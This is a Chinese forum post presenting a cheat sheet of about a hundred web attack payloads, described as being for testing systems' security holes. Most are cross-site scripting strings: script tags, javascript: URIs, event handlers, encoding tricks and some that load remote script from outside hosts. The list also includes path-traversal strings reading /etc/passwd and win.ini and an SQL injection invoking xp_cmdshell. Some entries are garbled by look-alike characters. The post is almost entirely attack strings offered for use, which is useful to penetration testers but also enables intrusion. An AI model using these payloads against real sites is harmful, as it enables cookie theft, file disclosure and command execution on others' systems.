热搜词
发表于 2022-6-8 20:52:52 | 显示全部楼层 |阅读模式
常用的xss攻击代码,便于测试系统安全漏洞
  1. 1'"()&%<acx><ScRiPt >prompt(915149)</ScRiPt>

  2. <svg/οnlοad=alert(1)>

  3. <script>alert(document.cookie)</script>

  4. '><script>alert(document.cookie)</script>

  5. ='><script>alert(document.cookie)</script>

  6. <script>alert(vulnerable)</script>

  7. %3Cscript%3Ealert('XSS')%3C/script%3E

  8. <script>alert('XSS')</script>

  9. <img src="javascript:alert('XSS')">

  10. %0a%0a<script>alert("Vulnerable")</script>.jsp

  11. %22%3cscript%3ealert(%22xss%22)%3c/script%3e

  12. %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

  13. %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

  14. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

  15. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

  16. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

  17. <script>alert('Vulnerable');</script>

  18. <script>alert('Vulnerable')</script>

  19. a.jsp/<script>alert('Vulnerable')</script>

  20. a?<script>alert('Vulnerable')</script>

  21. "><script>alert('Vulnerable')</script>

  22. ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&

  23. %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

  24. %3Cscript%3Ealert(document. domain);%3C/script%3E&

  25. %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

  26. <IMG src="javascript:alert('XSS');">

  27. <IMG src=javascript:alert('XSS')>

  28. <IMG src=JaVaScRiPt:alert('XSS')>

  29. <IMG src=JaVaScRiPt:alert("XSS")>

  30. <IMG src=javascript:alert('XSS')>

  31. <IMG src=javascript:alert('XSS')>

  32. <IMG src=javascript:alert('XSS')>

  33. <IMG src="jav ascript:alert('XSS');">

  34. <IMG src="jav ascript:alert('XSS');">

  35. <IMG src="jav ascript:alert('XSS');">

  36. "<IMG src=java\0script:alert("XSS")>";' > out

  37. <IMG src=" javascript:alert('XSS');">

  38. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

  39. <BODY BACKGROUND="javascript:alert('XSS')">

  40. <BODY ONLOAD=alert('XSS')>

  41. <IMG DYNSRC="javascript:alert('XSS')">

  42. <IMG LOWSRC="javascript:alert('XSS')">

  43. <BGSOUND src="javascript:alert('XSS');">

  44. <br size="&{alert('XSS')}">

  45. <LAYER src="http://xss.ha.ckers.org/a.js"></layer>

  46. <LINK REL="stylesheet" href="javascript:alert('XSS');">

  47. <IMG src='vbscript:msgbox("XSS")'>

  48. <IMG src="mocha:[code]">

  49. <IMG src="livescript:[code]">

  50. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

  51. <IFRAME src=javascript:alert('XSS')></IFRAME>

  52. <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>

  53. <TABLE BACKGROUND="javascript:alert('XSS')">

  54. <DIV STYLE="background-image: url(javascript:alert('XSS'))">

  55. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">

  56. <DIV STYLE="width: expression(alert('XSS'));">

  57. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

  58. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>

  59. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>

  60. <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>

  61. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

  62. <BASE href="javascript:alert('XSS');//">

  63. getURL("javascript:alert('XSS')")

  64. a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);

  65. <XML src="javascript:alert('XSS');">

  66. "> <BODY><SCRIPT>function a(){alert('XSS');}</SCRIPT><"

  67. <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>

  68. <IMG src="javascript:alert('XSS')"

  69. <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
  70. '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->

  71. <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

  72. <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

  73. <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

  74. <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>

  75. <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>

  76. <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>

  77. <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>

  78. <IMG SRC=javascript:alert(‘XSS’)>

  79. <IMG SRC=# οnmοuseοver=”alert(‘xxs’)”>

  80. <IMG SRC=/ οnerrοr=”alert(String.fromCharCode(88,83,83))”></img>

  81. <img src=x οnerrοr=”javascript:alert('XSS')″>

  82. <IMG SRC=javascript:alert(

  83. 'XSS')>

  84. <IMG SRC=javascript:alert('XSS')>

  85. <IMG SRC=”jav ascript:alert(‘XSS’);”>

  86. <IMG SRC=”jav
  87. ascript:alert(‘XSS’);”>

  88. <IMG SRC=”   javascript:alert(‘XSS’);”>

  89. <<SCRIPT>alert(“XSS”);//<</SCRIPT>

  90. <IMG SRC=”javascript:alert(‘XSS’)”

  91. </script><script>alert(‘XSS’);</script>

  92. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>

  93. <BODY BACKGROUND=”javascript:alert(‘XSS’)”>

  94. <svg/οnlοad=alert('XSS')>

  95. <IMG SRC=’vbscript:msgbox(“XSS”)’>

  96. <BGSOUND SRC="javascript:alert('XSS');">

  97. <BR SIZE="&{alert('XSS')}">

  98. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">

  99. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

  100. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

  101. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

  102. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

  103. <XSS STYLE="behavior: url(xss.htc);">

  104. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

  105. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

  106. <TABLE><TD BACKGROUND="javascript:alert('XSS')">

  107. <DIV STYLE="width: expression(alert('XSS'));">

  108. <SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
复制代码


全部评论0
回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2024-11-22 13:23 , Processed in 0.155833 second(s), 22 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2024 Discuz! Team